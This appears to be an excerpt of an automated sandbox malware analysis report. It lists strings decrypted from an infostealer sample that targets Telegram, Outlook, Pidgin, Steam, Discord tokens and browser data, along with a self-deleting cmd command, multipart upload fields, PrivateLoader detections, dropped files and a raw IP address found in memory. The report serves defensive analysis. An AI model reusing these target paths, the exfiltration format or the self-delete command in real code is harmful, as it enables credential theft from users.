Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Telegram Desktop\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: key_datas
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: map*
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Telegram
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: *.tox
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: *.ini
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Password
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: 00000001
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: 00000002
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: 00000003
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: 00000004
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Pidgin
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \.purple\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: accounts.xml
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: token:
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Software\Valve\Steam
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: SteamPath
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \config\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ssfn*
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: config.vdf
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DialogConfig.vdf
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: libraryfolders.vdf
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: loginusers.vdf
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Steam\
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: sqlite3.dll
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: browsers
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: done
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Soft
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: https
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: POST
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HTTP/1.1
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: hwid
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: build
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: token
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: file_name
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: file
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: message
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: screenshot.jpg

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151231039.log
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151237920.log
Source: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151300960.log
Source: C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe	File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20231121151306388.log

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RuntimeBroker.pdbUGP source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1637207390.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RuntimeBroker.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1637207390.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: yYAwgDWrkYJyyOGvYzyiJrxu.exe
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: OPqTdTFbxWlK6znimRD995XD.exe
Source:	Binary string: WmiPrvSE.pdbUGP source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdbp source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000E71000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: backgroundTaskHost.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MoUsoCoreWorker.pdbGCTL source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1658638420.0000012FFC6F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: spoolsv.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1646448289.0000012FFCCC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\wivapasiyuvaw_kicuwu\yupo-37\tun.pdb source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000000.1502064925.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: b.dll.pdb source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000000.1505650819.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000008.00000000.1510532640.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000000.1520861746.00000000010CD000.00000080.00000001.01000000.0000000D.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: yYAwgDWrkYJyyOGvYzyiJrxu.exe
Source:	Binary string: MoUsoCoreWorker.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636463543.0000012FFCCCE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WmiPrvSE.pdb source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: spoolsv.pdbUGP source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1646448289.0000012FFCCC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: +.exe.pdb source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000000.1505650819.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000008.00000000.1510532640.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000000.1520861746.00000000010CD000.00000080.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\yomux\vopey\safuvitizidoz-xoy28\lovihizonohe.pdb source: 8AbV0HUy7VtZhy8wnNLXmsko.exe, 0000000E.00000001.1532314523.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, TNpJBjREJ9Gyf03FTGsVwgMm.exe, 0000001E.00000001.1750064546.0000000000401000.00000020.00000001.01000000.0000001A.sdmp
Source:	Binary string: +.exe.pdbp source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000000.1505650819.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 00000008.00000000.1510532640.0000000000B4D000.00000080.00000001.01000000.00000008.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000000.1520861746.00000000010CD000.00000080.00000001.01000000.0000000D.sdmp
Source:	Binary string: backgroundTaskHost.pdbGCTL source: DU9aZfxw1xhKC4ykOgcxwHTl.exe, 0000000F.00000003.1636955898.0000012FFC6E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\wivapasiyuvaw_kicuwu\yupo-37\tun.pdb source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000000.1502064925.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp

Spreading

Yara detected PrivateLoader

Source: Yara match	File source: C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe, type: DROPPED

Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_0040553A FindFirstFileA,		32_2_0040553A
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Code function: 32_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		32_2_004055DE

Networking

Yara detected PrivateLoader

Source: Yara match	File source: C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe, type: DROPPED

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: lw8GpTDPA5CpaB9xdskKs5V3.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: zihCuAQZJ7sPILn6r3jO9GQY.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: zCvOx6XtSJ07pMQfH8UPv1oL.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: 9SGQSs1LUD8QXKzbk1xqOcnZ.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: IQbcma6zrvJ1HzUv5k9WE6QY.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: fqsYLNGMADr8Pe5IKZ4OWp3D.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: cFZJogIcWZegFIw2AubGvgEu.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: iJmdFm3rqTwH6xDLZ8cWxZXG.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: 6JaEfUgIwf0Dz0lqfMOcn7se.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: oNBeMrBpQUeJZTBuJ5mgI7VA.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: tqz2Az2q2AYLyjuBK1xHdTga.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: YZIOt1H7OqHvSxgYCR6O5zpg.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: 4EHgS2alV3RiwqAfmEQ0frTw.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: qrWI8PCVXnCZK60Db2frGhgL.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: zKRmyPOjumLsF9lPguEKV5Yd.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: XiQfgDjwaoRC0aI9y1xzbcbz.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: EbwRdwlpkBI3NzIA6ZPKj1CX.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: 2QIlVpy1FnjRPIOnHFE2X7B9.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: k39l0sX5PJRqCS3uCLYRxcLA.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: ZfCRGStu7Zk7TsNuGeK3K41q.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: Qzkxn5MX2dVznQURvJaX7GF4.exe.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File created: 37OEtIICZwQGY3VibExbHo6T.exe.4.dr
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: F4Qdxsrold2qERI1flyDP0Wg.exe.15.dr
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: x4Ya5MKnF3aCT1AJ8Z5SJfGt.exe.15.dr
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: DAtQ4XqD5Usfo4gF8z_3KYHd.exe.15.dr
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: YUs90TtW16jkIRN8eUZqSYBQ.exe.15.dr
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: A2I4Pi1m1VN3iZg1YDOjtF35.exe.15.dr
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File created: 5kBZDMiD3GP8J4HhIVdC5xHi.exe.15.dr

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.file.exe.2bd4758.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.2bd7180.0.raw.unpack, type: UNPACKEDPE

Source: OPqTdTFbxWlK6znimRD995XD.exe	String found in binary or memory: http://autoupdate-staging.services.ams.osa/
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://localhost:3001api/prefs/?product=$1&version=$2..
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, 3igcf6uAz0sWTHiwyuTtf5S5.exe, 00000009.00000002.2623630907.000002578FA80000.00000004.00000001.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1468881299.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1473871872.0000000006270000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: r1O81gOTKkD0PfSdUigHGcl2.exe, 00000007.00000003.1518401925.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, r1O81gOTKkD0PfSdUigHGcl2.exe, 0000000C.00000002.1546289700.0000000000EF1000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.opera.com0
Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1706606834.000000000077F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://167.235.143.166
